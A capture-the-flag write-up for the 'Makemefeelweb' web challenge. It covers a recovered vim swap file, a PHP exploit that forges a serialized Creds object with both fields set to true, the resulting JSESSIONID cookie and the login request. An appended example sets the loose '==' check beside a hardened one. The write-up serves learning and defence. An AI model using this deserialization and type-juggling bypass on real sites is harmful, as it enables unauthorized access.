Makemefeelweb (solved by kami)
GET /makemefeelweb/index.php HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/login.php
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Hint comment found at the top of the page (emacs config):
<!-- vim: set ts=2 sw=2: -->   <== HINT. Already checked it; I think it means tabstop=2 and shiftwidth=2,
i.e. tab width and code indent width.
<html>
<head>
<link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
<script src="assets/jquery-1.11.1.min.js"></script>
<script src="assets/bootstrap/js/bootstrap.min.js"></script>
<title>WUT</title>
</head>
It's the emacs vuln: here is an incomplete backup, https://ctf.noconname.org/makemefeelweb/.login.php.swp
<?php
// fragments recovered from the .swp file, in their likely order; unrecovered parts are marked
class Creds {
  public $p;
  public $u;
  public function __construct($_uname, $_passwd) {
    $this->p = $_passwd; $this->u = $_uname;
  }
}
if (isset($_COOKIE['JSESSIONID'])) {
  // cookie = base64(hex(serialize(...))); any "\x" separators are stripped before hex2bin
  @$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));
  // ... not recovered: $username / $password are presumably taken from $data ...
  if ($username == "p00p" && $password == "l!k34b4u5") { /* ... */ }
}
Exploit:
<?php
// both fields set to true: under loose "==", true == "p00p" and true == "l!k34b4u5" both hold
class Creds { public $p = true; public $u = true; }
$exploit = new Creds;
echo base64_encode(bin2hex(serialize($exploit)));
POST https://ctf.noconname.org/makemefeelweb/login.php HTTP/1.1
Content-Length: 30
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=
username=p00p&passwd=l!k34b4u5
NcN_7780*************************eba1578
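Added example (my own code, not the challenge's or the writeup's): the cookie pipeline reconstructed from the swap file, with the loose "==" check the forged cookie bypasses next to a hardened version. It assumes, as the writeup implies, that the compared username and password are the u and p fields of the unserialized Creds object.

```php
<?php
// Added example, not the challenge's own code: the cookie pipeline reconstructed
// from the swap file, with the loose "==" check next to a hardened version.

class Creds {
    public $p;
    public $u;
    public function __construct($_uname, $_passwd) {
        $this->p = $_passwd;
        $this->u = $_uname;
    }
}

// Same decoding as login.php: base64 -> strip "\x" -> hex -> unserialize.
function decodeCookie(string $cookie, bool $hardened) {
    $raw = @hex2bin(implode(explode("\\x", base64_decode($cookie))));
    if ($raw === false) {
        return null;
    }
    if ($hardened) {
        // Never instantiate classes from attacker-controlled bytes: any
        // object in the payload comes back as __PHP_Incomplete_Class.
        return @unserialize($raw, ['allowed_classes' => false]);
    }
    return @unserialize($raw);
}

// The vulnerable check: "==" coerces types, and true == "p00p" holds in PHP,
// so a Creds object whose fields are both true passes without the secrets.
function checkLoose($data): bool {
    return $data->u == "p00p" && $data->p == "l!k34b4u5";
}

// Hardened check: require the expected class, then compare with "===",
// which only matches a string of identical value.
function checkStrict($data): bool {
    return $data instanceof Creds
        && $data->u === "p00p"
        && $data->p === "l!k34b4u5";
}

// Forged cookie from the writeup: serialize(Creds{p=true,u=true}) -> hex -> base64.
$forged = 'NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=';

var_dump(checkLoose(decodeCookie($forged, false)));   // the bypass
var_dump(checkStrict(decodeCookie($forged, false)));  // blocked by ===
var_dump(checkStrict(decodeCookie($forged, true)));   // blocked: not a Creds
```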